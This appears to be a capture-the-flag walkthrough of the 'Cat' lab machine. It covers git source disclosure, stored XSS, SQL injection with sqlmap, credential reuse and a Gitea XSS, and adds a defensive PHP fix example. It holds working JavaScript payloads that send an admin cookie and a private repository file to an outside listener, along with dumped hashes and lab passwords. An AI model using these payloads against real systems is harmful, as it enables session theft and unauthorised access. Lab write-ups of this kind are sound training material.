Cat

10.10.11.53

nmap

# Nmap 7.95 scan initiated Sat Apr 19 15:15:24 2025 as: nmap -e utun4 -sC -sV -vv -oA nmap/default 10.10.11.53
Nmap scan report for 10.10.11.53
Host is up, received reset ttl 63 (0.12s latency).
Scanned at 2025-04-19 15:15:37 CST for 15s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
| 256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEmL+UFD1eC5+aMAOZGipV3cuvXzPFlhqtKj7yVlVwXFN92zXioVTMYVBaivGHf3xmPFInqiVmvsOy3w4TsRja4=
| 256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEOCpb672fivSz3OLXzut3bkFzO4l6xH57aWuSu4RikE
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 19 15:15:52 2025 -- 1 IP address (1 host up) scanned in 28.17 seconds

Add cat.htb to the hosts file (the HTTP title shows the redirect to http://cat.htb/).

Git disclosure

The web root exposes a .git directory. Use GitHack to download the source code.

Source code audit

XSS

The page where the administrator reviews pending cats does not filter the username field, so there is a stored XSS here.
Register with the payload as the username, start a listener, then log in and upload a cat picture; when the administrator views the submission, the listener receives the administrator's cookie.

SQL injection

accept_cat.php concatenates the catName parameter directly into the SQL it executes, so run sqlmap against the captured request:

$ sqlmap -r accept.req -p catName --dbms=SQLite --level=5 --risk=3 --batch
+---------+-------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------+
| user_id | email | password | username |
+---------+-------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------+
| 1 | [email protected] | d1bbba3670feb9435c9841e46e60ee2f | axel |
| 2 | [email protected] | ac369922d560f17d6eeb8b2c7dec498c | rosa |
| 3 | [email protected] | 42846631708f69c00ec0c0a8aa4a92ad | robert |
| 4 | [email protected] | 39e153e825c4a3d314a0dc7f7475ddbe | fabian |
| 5 | [email protected] | 781593e060f8d065cd7281c5ec5b4b86 | jerryson |
| 6 | [email protected] | 1b6dce240bbfbc0905a664ad199e18f8 | larry |
| 7 | [email protected] | c598f6b844a36fa7836fba0835f1f6 | royer |
| 8 | [email protected] | e41ccefa439fc454f7eadbf1f139ed8a | peter |
| 9 | [email protected] | 24a8ec003ac2e1b3c5953a6f95f8f565 | angel |
| 10 | [email protected] | 88e4dceccd48820cf77b5cf6c08698ad | jobert |
| 11 | 3334 | e10adc3949ba59abbe56e057f20f883e | <script>var xhr=new XMLHttpRequest();xhr.open('GET','http://10.10.16.24:8001/?re'+document.cookie,true);xhr.send();</script> |
+---------+-------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------+
Cracking rosa's hash on CrackStation gives the credentials rosa:soyunaprincesarosa, which work for SSH.
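A hardened form of the two application bugs above (the unescaped username on the admin review page and the concatenated catName in accept_cat.php), written as an added PHP example rather than the box's own code; the cats table layout, column names and function names are assumptions:

```php
<?php
// Added example, not the box's own accept_cat.php or admin page.
// Assumed schema: cats(cat_name, username, status); all names are assumptions.

// --- vulnerable patterns, as the writeup describes them ---
function accept_cat_vulnerable(PDO $db, string $catName): void {
    // catName is pasted straight into the statement, so the value can rewrite the query
    $db->exec("UPDATE cats SET status = 'accepted' WHERE cat_name = '$catName'");
}

function render_pending_vulnerable(PDO $db): string {
    $html = '';
    foreach ($db->query("SELECT username, cat_name FROM cats WHERE status = 'pending'") as $row) {
        // username is echoed unescaped: a <script> stored at registration runs in the admin's browser
        $html .= "<tr><td>{$row['username']}</td><td>{$row['cat_name']}</td></tr>";
    }
    return $html;
}

// --- hardened forms ---
function accept_cat_fixed(PDO $db, string $catName): void {
    // Bound parameter: the value is data and can never change the statement's structure
    $stmt = $db->prepare("UPDATE cats SET status = 'accepted' WHERE cat_name = :name");
    $stmt->execute([':name' => $catName]);
}

function render_pending_fixed(PDO $db): string {
    $html = '';
    foreach ($db->query("SELECT username, cat_name FROM cats WHERE status = 'pending'") as $row) {
        // Output-encode every user-controlled value for the HTML context it lands in
        $u = htmlspecialchars($row['username'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $c = htmlspecialchars($row['cat_name'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $html .= "<tr><td>$u</td><td>$c</td></tr>";
    }
    return $html;
}

// Demo against an in-memory SQLite database with one constructed pending row
ini_set('session.cookie_httponly', '1'); // keeps document.cookie out of reach of script even if an XSS slips through
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE cats (cat_name TEXT, username TEXT, status TEXT)");
$db->prepare("INSERT INTO cats VALUES (:c, :u, 'pending')")
   ->execute([':c' => 'Tom', ':u' => '<script>alert(1)</script>']);
echo render_pending_fixed($db), "\n";      // the script tag is rendered as inert text
accept_cat_fixed($db, "Tom' OR '1'='1");   // matches no row; the vulnerable version would accept every cat
echo $db->query("SELECT count(*) FROM cats WHERE status = 'accepted'")->fetchColumn(), "\n";
```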

linpeas.sh

Running as rosa

rosa is in the adm group and can therefore read the Apache logs.
This is the consequence of passing credentials as GET parameters: they are written to the access log. The log yields axel:aNdZwgC4tI9gnVXv_e3Q, which works for SSH.

ports

Port 3000 runs a Gitea instance.

Running as axel

crontab

sendmail
Message-Id: <[email protected]>
Subject: New cat services

Hi Axel,

We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.

Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.

From [email protected] Sat Sep 28 05:05:28 2024
Return-Path: <[email protected]>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
for <[email protected]>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: [email protected]
Message-Id: <[email protected]>
Subject: Employee management

We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.

Gitea on :3000

rosa:soyunaprincesarosa does not log in.
axel:aNdZwgC4tI9gnVXv_e3Q logs in, but the account has no repositories.
Gitea 1.22.0 has an XSS: https://www.exploit-db.com/exploits/52077
Following the hint in the earlier mail, create a repository carrying the payload and mail its link to jobert.

<!-- set the repository description to the following -->
<a href='javascript:fetch("http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md").then(response=>response.text()).then(data=>fetch("http://10.10.16.24:8001/?d="+encodeURIComponent(btoa(unescape(encodeURIComponent(data))))));'>SAFE</a>

# send the mail to jobert@localhost
$ echo "http://localhost:3000/axel/test" | sendmail jobert@localhost

The listener then receives the contents of http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md, base64-encoded by the payload. Decoded, index.php from the same repository reads:
// http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php
<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
$_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {

header('WWW-Authenticate: Basic realm="Employee Management"');
header('HTTP/1.0 401 Unauthorized');
exit;
}

header('Location: dashboard.php');
exit;

Privilege escalation

The password IKw75eR0MR7CMIxhH0 found in the Gitea source works for su -, giving root.

Summary

Git disclosure leaks the source code; XSS gives access to the vulnerable endpoint; SQL injection yields rosa's password; the adm group can read the log that records the login endpoint's GET parameters, which yields axel's password and a user shell.
An XSS in Gitea reads the repository source, which yields the admin password and a root shell.